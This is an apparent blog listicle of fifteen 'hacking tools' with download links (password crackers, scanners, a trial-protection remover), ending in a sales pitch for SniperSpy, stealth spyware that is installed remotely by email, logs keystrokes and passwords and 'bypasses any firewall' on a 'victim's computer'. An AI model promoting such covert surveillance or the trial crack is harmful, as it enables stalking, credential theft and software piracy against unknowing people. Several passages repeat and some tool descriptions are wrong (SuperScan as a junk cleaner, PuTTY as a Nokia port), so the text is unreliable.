If you´re interested in hacking, you´ll need a good set of base tools with which to work. Hopefully, there are many free hacking tools online which can help you . Below you can find list of hacking tools.
1. Date Cracker 2000
Data Cracker 2000 is an application which can easily remove the date protection(i.e. trail protection) from many software. It is very useful for shareware or trial versions of software which expire after a specific date. When you crack the software with Date Cracker 2000, the software will always show something like “There are 90 days remaining in your trial period” and the software will actually last forever :). Some programs have good protection and it isn’t possible to remove their date protection .
Date Cracker 2000 | ||
Website | http://www.e-tech.ca/003-dc2000.asp | |
Download Page | http://www.wonderworks.ca/nbia/dc20000.zip | |
File size | 1.5 MB | |
Video Tutorial | http://www.wonderworks.ca/nbia/dc2000.wmv |
2. Advanced Port Scanner
This is small size, very fast and simple for use port scanner . Just type IP Addresses of the computer , that you want to scan and you´ll get detailed descriptions for common ports.
Advanced Port Scanner | ||
Website | http://www.radmin.com/products/utilities/portscanner.php | |
Download Page | http://www.download.com/Advanced-Port-Scanner | |
File size | 426 KB | |
Operating System | Windows 95/98/ME/NT4.0/2000/XP/2003/Vista/2008 | |
License: | Free |
3. Ophcrack
Ophcrack is great tool which can easy crack or recover lost Windows password . It works using rainbow tables and brute force combined. For more information about this software visit my older post ” How to crack windows XP password “.
Ophcrack | ||
Website | http://ophcrack.sourceforge.net/ | |
Download Page | http://ophcrack.sourceforge.net/download.php?type=ophcrack | |
File size | 4.90 MB | |
Video Tutorial | Video |
4. RAR Password Cracker
This is very effective program, which can easily to crack RAR/WinRAR password, it use a dictionary and a brute force attack.For more informatio about cracking here is detailed tutorial step by step How To Crack The Password Of The RAR File
This is very effective program, which can easily to crack RAR/WinRAR password, it use a dictionary and a brute force attack.For more informatio about cracking here is detailed tutorial step by step How To Crack The Password Of The RAR File
RAR Password Cracker | ||
Website | http://www.rarpasswordcracker.com/ | |
Download Page | http://www.rarpasswordcracker.com/rpc412_setup.exe | |
File size | 205 Kb | |
License | Freeware |
5. PC Activity Monitor
PC Activity Monitor is an ultimate invisible and undetectable easy-to-use monitoring and surveillance tool for both networked and personal PCs. It is professional software that captures all users activity on the PC. All data collected by the monitoring are saved to encrypted log file. The log file can be optionally sent via e-mail to a specified address (or saved to a specified shared resource in LAN environment) for further inspection and analysis.
PC Activity Monitor | ||
Website | http://3d2f.com/programs/0-545-pc-activity-monitor-pro-download.shtml | |
Download Page | http://download.softsecurity.com/5/6/pca_pro.zip | |
File size | 1192 kb | |
License | Shareware | |
Operating System | Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, Windows XP |
6. Cain & Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of several kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
Cain & Abel | ||
Website | http://www.oxid.it/cain.html | |
Download Page | http://www.oxid.it/cain.html | |
File size | 660 KB | |
License | Freeware | |
Operating System | Windows iNT/2000/XP |
7. SpyRemover Pro 3.05
SpyRemover detects and removes more than 140.000 intrusive devices such as spyware, adware, hijackers, keyloggers, Trojans, tracking devices, hacker tools, and other spy devices on your PC. This spyware remover is powerful and easy to use.
SpyRemover | ||
Website | http://3d2f.com/programs/6-183-spyremover-pro-download.shtml | |
Download Page | http://www.itcompany.com/remover.exe | |
File size | 6172 kb | |
License | Shareware | |
Operating System | Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista |
8. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
Nikto | ||
Website | http://www.cirt.net/nikto2 | |
Download Page | http://www.cirt.net/nikto2 | |
File size | 390 kb | |
License | Freeware |
9. SuperScan
SuperScan is an user-friendly tool for cleaning the junk files.Only click your mouse, it clean all the junk files quickly and safely.
SuperScan is an user-friendly tool for cleaning the junk files.Only click your mouse, it clean all the junk files quickly and safely.
SuperScan | ||
Website | http://www.snapfiles.com/publishers/foundstone-inc/index.html | |
Download Page | http://www.snapfiles.com/download/dlsuperscan.html | |
File size | 196 kb | |
License | Freeware | |
Operating System | Windows 2000/XP |
10. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
Yersinia | ||
Website | http://www.yersinia.net/ | |
Download Page | http://www.yersinia.net/download.htm |
11. PuTTY
PuTTY is an SSH client port to the Nokia 9200 Communicator series. The current version contains basic SSH protocol support, terminal emulation, and a bare-bones user interface.
PuTTY | ||
Website | http://www.chiark.greenend.org.uk/~sgtatham/putty/ | |
Download Page | http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html | |
File size | 196 kb | |
License | Freeware | |
Operating System | Windows 2000/XP |
12. Nessus
The Nessus is vulnerability scanner, featuring high speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs, and across physically separate networks.
Nessus | ||
Website | http://www.nessus.org/nessus/ | |
Download Page | http://www.nessus.org/download/ | |
File size | 26.51MB | |
License | Freeware |
13. Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Hping | ||
Website | http://www.hping.org// | |
Download Page | http://www.hping.org/download.php | |
License | Freeware | |
Operating System | Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows |
14. coWPAtty
coWPAtty is designed to audit the security of pre-shared keys selected in WiFi Protected Access (WPA) networks.
coWPAtty | ||
Website | http://wirelessdefence.org/Contents/coWPAttyMain.html | |
Download Page | http://sourceforge.net/project/downloading.php?group_id=123588&use_mirror=freefr&filename=cowpatty-2.0.tgz&a=31536266 | |
License | Freeware |
15. DumpAutoComplete v0.7
This application will search for the default Firefox profile of the user who runs the tool and dump the AutoComplete cache in XML format to standard output. Alternatively, autocomplete files can be passed to the application and they will be parsed as well. This application understands mork based autocomplete files (Firefox 1.x) as well as SQLite based formhistory and webappsstore files (Firefox 2.x).
DumpAutoComplete v0.7 | ||
Website | http://www.foundstone.com/us/resources/proddesc/dumpautocomplete.htm | |
Download Page | http://www.foundstone.com/us/resources/termsofuse.asp?file=dumpautocomplete.zip | |
License | Freeware |
If you want high quality hacking software , I recommend remote spying software SniperSpy . Sniperspy is completely reliable and user-friendly,It is worth price that you pay for it.
SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access! Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel! This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!
SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
4. Records any Password (Email, Login, Instant Messenger etc.)
5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall
What if i dont have physical acess to victims computer?
No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.
This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.
The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.
This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.
The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.
Why would I need SniperSpy?
Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can’t get to your computer and are worried about the Internet safety or habits of those using it, then you NEED SniperSpy.
This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).
This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).
Comments